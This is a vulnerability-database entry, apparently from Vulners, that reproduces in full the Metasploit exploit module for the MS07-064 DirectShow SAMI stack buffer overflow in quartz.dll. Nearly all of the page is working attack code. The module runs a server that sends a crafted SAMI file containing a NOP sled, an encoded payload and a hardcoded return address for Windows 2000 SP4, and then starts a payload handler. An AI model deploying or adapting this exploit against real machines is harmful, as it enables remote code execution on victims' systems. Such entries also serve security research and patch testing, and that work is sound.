Microsoft DirectX DirectShow SAMI Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Microsoft DirectX DirectShow SAMI Buffer Overflow in quartz.dll. Exploits stack buffer overflow. Tested with Windows Media Player (6.4.09.1129) and DirectX 8.0


                                                ##
# $Id: ms07_064_sami.rb 10550 2010-10-05 01:05:49Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Microsoft DirectX DirectShow SAMI Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in the DirectShow Synchronized
				Accessible Media Interchanged (SAMI) parser in quartz.dll. This module
				has only been tested with Windows Media Player (6.4.09.1129) and
				DirectX 8.0.
			},
			&#39;Author&#39;         =&#62; &#39;MC&#39;,
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 10550 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2007-3901&#39; ],
					[ &#39;OSVDB&#39;, &#39;39126&#39; ],
					[ &#39;MSB&#39;, &#39;MS07-064&#39; ],
					[ &#39;BID&#39;, &#39;26789&#39; ],
				],
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;process&#39;,
				},
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 600,
					&#39;BadChars&#39; =&#62; &#34;\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40&#34;,
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[ &#39;Windows 2000 Pro SP4 English&#39;, { &#39;Offset&#39; =&#62; 22412, &#39;Ret&#39; =&#62; 0x75022ac4 } ],
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;DisclosureDate&#39; =&#62; &#39;Dec 11 2007&#39;,
			&#39;DefaultTarget&#39;  =&#62; 0))
	end

	def on_client_connect(client)
		return if ((p = regenerate_payload(client)) == nil)

		client.get_once

		buffer =  make_nops(target[&#39;Offset&#39;] - payload.encoded.length) + payload.encoded
		buffer &#60;&#60; Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack(&#39;V&#39;)
		buffer &#60;&#60; make_nops(10) + [0xe8, -485].pack(&#39;CV&#39;) + rand_text_english(132324)

		header =  &#34;HTTP/1.1 200 OK\r\n&#34;
		header &#60;&#60; &#34;Content-Type: application/smil\r\n\r\n&#34;

		body =  &#34;&#60;SAMI&#62;\r&#60;HEAD&#62;\r&#60;STYLE TYPE=\&#34;text/css\&#34;&#62;\r&#34;
		body &#60;&#60; &#34;&#60;!--\rP {font-size: 1em;\rfont-family: Arial;\r&#34;
		body &#60;&#60; &#34;font-weight: normal;\rcolor: #FFFFFF;\r&#34;
		body &#60;&#60; &#34;background: #FFFFFF;\rtext-align: center;\r&#34;
		body &#60;&#60; &#34;padding-left: 2px;\rpadding-right: 2px;\r&#34;
		body &#60;&#60; &#34;padding-bottom: 2px;\r}\r.ENUSCC { Name: English; lang: EN-US-CC; }\r&#34;
		body &#60;&#60; &#34;--&#62;\r&#60;/STYLE&#62;\r&#60;/HEAD&#62;\r&#60;BODY&#62;\r&#34;
		body &#60;&#60; &#34;&#60;SYNC Start=\&#34;0\&#34; pippo=\&#34;&#34; + buffer
		body &#60;&#60; &#34;\&#34;&#62;&#60;P Class=\&#34;ENUSCC\&#34;&#62;&#60;/P&#62;&#60;/SYNC&#62;&#60;/BODY&#62;&#60;/SAMI&#62;&#34;

		sploit = header + body

		print_status(&#34;Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...&#34;)

		client.put(sploit)
		handler(client)

		service.close_client(client)
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1